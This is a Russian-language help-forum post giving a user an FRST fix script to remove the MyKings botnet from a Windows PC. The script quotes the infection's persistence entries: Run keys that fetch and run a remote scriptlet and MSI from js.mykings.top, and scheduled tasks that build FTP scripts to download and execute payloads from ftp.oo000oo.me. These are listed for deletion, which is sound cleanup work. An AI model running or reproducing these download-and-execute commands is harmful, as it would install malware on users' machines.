- Отключите до перезагрузки антивирус.
- Выделите следующий код:
Код:

Start::
CreateRestorePoint:
() C:\Windows\debug\lsmose.exe
VirusTotal: C:\Windows\debug\lsmose.exe;C:\Program Files (x86)\Common Files\BattlEye\BEService.exe;C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
C:\Windows\debug\lsmose.exe
HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll <==== ATTENTION
HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q <==== ATTENTION
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
2017-09-25 20:16 - 2017-09-25 20:16 - 000003502 _____ C:\Windows\System32\Tasks\Mysa3
2017-09-25 20:16 - 2017-09-25 20:16 - 000003422 _____ C:\Windows\System32\Tasks\Mysa2
2017-09-25 20:16 - 2017-09-25 20:16 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1
2017-09-25 20:16 - 2017-09-25 20:16 - 000003186 _____ C:\Windows\System32\Tasks\ok
Task: {79FD536D-5011-4AD0-A49E-EA9FE5DE1BEE} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {358986D7-9BE6-4252-B909-6404E04B9D19} - System32\Tasks\Mysa3 => cmd /c echo open ftp.oo000oo.me>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
Task: {E86CF195-AB93-42DF-A266-D065BC7E94D4} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
Task: {F837B228-089C-49C0-A076-8AB92DCAA347} - System32\Tasks\Mysa2 => cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
2017-08-08 21:53 - 2017-09-22 09:44 - 003023872 _____ () c:\windows\debug\lsmose.exe
EmptyTemp:
Reboot:
End::
- Скопируйте выделенный текст (правой кнопкой - Копировать).
- Запустите FRST (FRST64) от имени администратора.
- Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.
Подробнее читайте в
этом руководстве.
И такую проверку сделайте
https://safezone.cc/resources/prover...ilitoj-sfc.55/